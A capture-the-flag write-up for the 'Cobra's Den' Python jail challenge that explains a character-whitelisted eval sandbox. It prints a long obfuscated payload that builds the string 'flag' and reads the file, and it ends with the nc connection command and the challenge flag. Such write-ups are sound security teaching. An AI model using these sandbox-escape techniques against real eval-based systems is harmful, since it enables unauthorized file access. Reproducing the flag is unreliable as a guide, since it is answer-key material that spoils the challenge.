dump

Miscellaneous

Cobra's Den - Python Jail Exploit

Solution
  • File: chal.py (provided as part of the challenge).

Tools/Methods Used

  • Netcat (nc): To connect to the challenge server.

  • Python Exploitation: Crafting payloads to bypass security checks.

Goals

  1. Bypass the security restrictions in the Python sandbox.

  2. Read the flag stored in the current directory.

Solution

Understanding the Code

The challenge script implements multiple layers of security to restrict input:

  • Filtered Builtins: Only allows built-ins with names ≤ 4 characters and print.

  • Whitelist Check: Restricts allowed characters and ensures commands meet specific length and format constraints.

  • Sandbox Execution: Uses eval() with strict filtered built-ins.

Crafting the Payload

  1. The security_check function restricts:

    • Character set: <ph[(cobras.den)]+~.

    • Command length: ≤ 1115.

    • Dots: ≤ 1.

  2. Using creative Python expressions and allowed characters, crafted this payload:

    open(chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+abs(~(()<())+~(()<())+~(()<())+~(()<())))+chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+abs(~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())+~(()<())))+chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+~(()<()))+chr(ord(repr(abs(~(()<()))))+ord(repr(abs(~(()<()))))+abs(~(()<())+~(()<())+~(()<())+~(()<())+~(()<())))).read()
  3. This payload dynamically constructs the string flag using arithmetic and character operations within the allowed constraints.

  4. Finally, the open(...).read() reads the flag.

Why This Payload Works:

  1. String Construction:

    • Each chr(...) evaluates to one character in the string flag.

    • Bitwise operations (~, <), along with arithmetic functions (abs, ord), are used to generate valid ASCII values.

    • These operations stay within the allowed character set.

  2. Whitelisted Characters:

    • All characters in the payload are part of <ph[(cobras.den)]+~.

    • The payload cleverly combines operations to generate necessary outputs without breaking the restrictions.

  3. File Access:

    • The string flag is passed to open() to access the flag file.

    • The .read() method is used to read its contents while adhering to the one-dot restriction.

Execution Steps:

  1. Connect to the challenge server using netcat:

    nc cobras-den.chal.irisc.tf 10400
  2. Input the crafted payload.

  3. Retrieve the flag from the server’s output.

Final Answer

irisctf{pyth0n_has_s(+([]<[]))me_whacky_sh(+([]<[[]]))t}

Summary

This challenge required bypassing stringent Python sandbox restrictions. By carefully analyzing the code and exploiting allowed operations, a payload was constructed to access and read the flag file.

Remarks/Tags/Lessons Learned

  • Python Jail Escapes: This challenge exemplifies how restricted Python environments (or "Python jails") can be bypassed using creative payloads.

  • Exploiting Limited Built-ins: The restricted environment allowed only a few functions, but a deep understanding of these basics enabled the crafting of the payload.

  • Character Whitelist Challenges: The strict whitelist required creative use of allowed characters to construct complex commands.

  • Lessons Learned:

    1. Even a limited character set can be exploited for powerful results if the restrictions aren’t absolute.

    2. Bitwise operations, while simple, can provide surprising flexibility in such challenges.

    3. Sandbox security requires rigorous testing to prevent such bypasses.

  • Tags: sandbox, python jail, eval, ctf, python exploitation, security testing.

Last updated